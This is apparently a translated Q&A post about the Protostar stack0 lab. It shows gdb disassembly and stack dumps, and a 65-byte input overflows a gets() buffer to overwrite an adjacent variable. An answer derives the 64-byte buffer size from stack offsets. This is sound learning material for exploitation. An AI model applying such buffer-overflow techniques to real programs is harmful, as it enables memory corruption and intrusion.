Protostar Stack 0挑战:如何从汇编代码中找出缓冲区大小?

时间:2018-10-22 14:30:08

标签: c assembly

我一直在尝试protostar stack0挑战,想知道如果没有源代码,如何找出缓冲区大小。

原始站点(http://exploit-exercises.com/protostar)不再可用,但是您仍然可以从https://download.vulnhub.com/exploitexercises/exploit-exercises-protostar-2.iso下载ISO副本

这是汇编代码

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave  
0x08048434 <main+64>:   ret    
End of assembler dump.
(gdb)

基于代码,我可以看到gets函数(从stdin中读取一行)。

0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]

因此,我在该行之前和之后都设置了断点,以查看其功能。

(gdb) info breakpoints 
No breakpoints or watchpoints.
(gdb) break *0x0804840c
Breakpoint 3 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 4 at 0x8048411: file stack0/stack0.c, line 13.
(gdb) 

是时候使用随机数据测试gets函数了。

user@protostar:~$ python -c 'print "A"*60'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
user@protostar:~$ 

在第一种情况下,我将提供60 *一个字符。我使用上面的python代码生成60个A字符。

(gdb) r
Starting program: /opt/protostar/bin/stack0 

Breakpoint 3, 0x0804840c in main (argc=1, argv=0xbffff864) at stack0/stack0.c:11
11      in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 4, main (argc=1, argv=0xbffff864) at stack0/stack0.c:13
13      in stack0/stack0.c
(gdb) i r $eip $esp $ebp
eip            0x8048411        0x8048411 <main+29>
esp            0xbffff750       0xbffff750
ebp            0xbffff7b8       0xbffff7b8
(gdb) x/40 $esp
0xbffff750:     0xbffff76c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x08048400      0x00000000
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864      0xbffff86c      0xb7fe1848
0xbffff7d0:     0xbffff820      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff7e0:     0x00000001      0xbffff820      0xb7ff0626      0xb7fffab0
(gdb) c
Continuing.
Try again?

Program exited with code 013.
(gdb) 

我知道如果看到源代码,如果我输入超过64 A的电流,我就会得到答案。

(gdb) r
Starting program: /opt/protostar/bin/stack0 

Breakpoint 3, 0x0804840c in main (argc=1, argv=0xbffff864) at stack0/stack0.c:11
11      in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 4, main (argc=1, argv=0xbffff864) at stack0/stack0.c:13
13      in stack0/stack0.c
(gdb) i r $eip $esp $ebp
eip            0x8048411        0x8048411 <main+29>
esp            0xbffff750       0xbffff750
ebp            0xbffff7b8       0xbffff7b8
(gdb) x/40 $esp
0xbffff750:     0xbffff76c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x00000041
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864      0xbffff86c      0xb7fe1848
0xbffff7d0:     0xbffff820      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff7e0:     0x00000001      0xbffff820      0xb7ff0626      0xb7fffab0
(gdb) c
Continuing.
you have changed the 'modified' variable

Program exited with code 051.
(gdb) 

问题是,如果我没有源代码怎么办?

如何找出确切的缓冲区大小?

1 个答案:

答案 0 :(得分:0)

我是RE的新手,但我会尽力回答

0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]

在main + 9上,它在[esp + 0x5c]上存储0x0,并且任何输入将从[esp + 0x1c]到[esp + 0x5c]都存储在缓冲区中。所以0x5c-0x1c = 64(十进制)